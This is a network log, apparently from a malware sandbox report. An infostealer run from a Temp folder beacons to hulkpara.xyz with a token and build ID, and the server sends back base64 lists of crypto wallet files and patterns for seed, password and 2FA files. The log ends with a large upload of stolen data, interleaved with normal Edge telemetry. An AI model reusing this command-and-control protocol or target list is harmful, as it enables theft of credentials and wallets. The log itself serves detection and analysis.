2024-12-18 20:09:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	49850	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:44 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----P8QIEKFCJW4E37YCJM79 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:44 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 38 51 49 45 4b 46 43 4a 57 34 45 33 37 59 43 4a 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 4b 46 43 4a 57 34 45 33 37 59 43 4a 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 4b 46 43 4a 57 34 45 33 37 59 43 4a 4d 37 39 0d 0a 43 6f 6e 74 Data Ascii: ------P8QIEKFCJW4E37YCJM79Content-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------P8QIEKFCJW4E37YCJM79Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P8QIEKFCJW4E37YCJM79Cont
2024-12-18 20:09:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:45 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	49854	51.104.15.253	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:45 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734552582366&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11952 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-18 20:09:45 UTC	11952	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 32 30 3a 30 39 3a 34 32 2e 33 36 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 37 32 37 63 36 37 2d 61 61 39 64 2d 34 61 30 64 2d 62 34 35 63 2d 63 30 33 30 31 30 36 61 37 38 37 64 22 2c 22 65 70 6f 63 68 22 3a 22 33 31 39 31 30 30 33 37 34 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-18T20:09:42.364Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"ef727c67-aa9d-4a0d-b45c-c030106a787d","epoch":"3191003749"},"app":{"locale
2024-12-18 20:09:45 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=5d11b557f77242f9825946563d8497ea&HASH=5d11&LV=202412&V=4&LU=1734552585551; Domain=.microsoft.com; Expires=Thu, 18 Dec 2025 20:09:45 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=ab605b685cb947b3bf5008affbf46460; Domain=.microsoft.com; Expires=Wed, 18 Dec 2024 20:39:45 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3185 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Wed, 18 Dec 2024 20:09:44 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	49853	51.104.15.253	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:45 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734552582370&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5220 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-18 20:09:45 UTC	5220	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 32 30 3a 30 39 3a 34 32 2e 33 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 37 32 37 63 36 37 2d 61 61 39 64 2d 34 61 30 64 2d 62 34 35 63 2d 63 30 33 30 31 30 36 61 37 38 37 64 22 2c 22 65 70 6f 63 68 22 3a 22 33 31 39 31 30 30 33 37 34 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-18T20:09:42.369Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"ef727c67-aa9d-4a0d-b45c-c030106a787d","epoch":"3191003749"},"app":{"locale
2024-12-18 20:09:45 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=7b84b08cb3a944088be8ef2bc798050b&HASH=7b84&LV=202412&V=4&LU=1734552585561; Domain=.microsoft.com; Expires=Thu, 18 Dec 2025 20:09:45 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=890334c47f3b48b595ef6002a3d3fe05; Domain=.microsoft.com; Expires=Wed, 18 Dec 2024 20:39:45 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3191 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Wed, 18 Dec 2024 20:09:44 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	49855	51.104.15.253	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:46 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734552583196&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5418 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1; msnup=
2024-12-18 20:09:46 UTC	5418	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 32 30 3a 30 39 3a 34 33 2e 31 39 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 37 32 37 63 36 37 2d 61 61 39 64 2d 34 61 30 64 2d 62 34 35 63 2d 63 30 33 30 31 30 36 61 37 38 37 64 22 2c 22 65 70 6f 63 68 22 3a 22 33 31 39 31 30 30 33 37 34 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-18T20:09:43.195Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"ef727c67-aa9d-4a0d-b45c-c030106a787d","epoch":"3191003749"},"app":{"locale
2024-12-18 20:09:46 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=19a6edab085b493d8d453734c218c3b0&HASH=19a6&LV=202412&V=4&LU=1734552586385; Domain=.microsoft.com; Expires=Thu, 18 Dec 2025 20:09:46 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=7d905c5cf4d348c7809ede825c72b1f8; Domain=.microsoft.com; Expires=Wed, 18 Dec 2024 20:39:46 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3189 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Wed, 18 Dec 2024 20:09:46 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.9	49856	51.104.15.253	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:46 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734552583364&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9821 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1; msnup=
2024-12-18 20:09:46 UTC	9821	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 32 30 3a 30 39 3a 34 33 2e 33 36 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 37 32 37 63 36 37 2d 61 61 39 64 2d 34 61 30 64 2d 62 34 35 63 2d 63 30 33 30 31 30 36 61 37 38 37 64 22 2c 22 65 70 6f 63 68 22 3a 22 33 31 39 31 30 30 33 37 34 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-18T20:09:43.363Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"ef727c67-aa9d-4a0d-b45c-c030106a787d","epoch":"3191003749"},"app":{"loc
2024-12-18 20:09:46 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=cd442f1e02174a58a915d416bafb7722&HASH=cd44&LV=202412&V=4&LU=1734552586572; Domain=.microsoft.com; Expires=Thu, 18 Dec 2025 20:09:46 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=deaa767939a349d892df4497670fa1e1; Domain=.microsoft.com; Expires=Wed, 18 Dec 2024 20:39:46 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3208 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Wed, 18 Dec 2024 20:09:45 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.9	49857	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:46 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----H47YMGLX4OZM7YC2NOZM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:46 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 34 37 59 4d 47 4c 58 34 4f 5a 4d 37 59 43 32 4e 4f 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 48 34 37 59 4d 47 4c 58 34 4f 5a 4d 37 59 43 32 4e 4f 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 48 34 37 59 4d 47 4c 58 34 4f 5a 4d 37 59 43 32 4e 4f 5a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------H47YMGLX4OZM7YC2NOZMContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------H47YMGLX4OZM7YC2NOZMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------H47YMGLX4OZM7YC2NOZMCont
2024-12-18 20:09:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:47 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.9	49860	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:49 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4EK6XT2N7YCBAIEK6XT0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:49 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 45 4b 36 58 54 32 4e 37 59 43 42 41 49 45 4b 36 58 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 36 58 54 32 4e 37 59 43 42 41 49 45 4b 36 58 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 36 58 54 32 4e 37 59 43 42 41 49 45 4b 36 58 54 30 0d 0a 43 6f 6e 74 Data Ascii: ------4EK6XT2N7YCBAIEK6XT0Content-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------4EK6XT2N7YCBAIEK6XT0Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------4EK6XT2N7YCBAIEK6XT0Cont
2024-12-18 20:09:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.9	49863	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:51 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OHL68Q16FUSJM7YUK6FU User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 98213 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:51 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 51 31 36 46 55 53 4a 4d 37 59 55 4b 36 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 51 31 36 46 55 53 4a 4d 37 59 55 4b 36 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 51 31 36 46 55 53 4a 4d 37 59 55 4b 36 46 55 0d 0a 43 6f 6e 74 Data Ascii: ------OHL68Q16FUSJM7YUK6FUContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------OHL68Q16FUSJM7YUK6FUContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------OHL68Q16FUSJM7YUK6FUCont
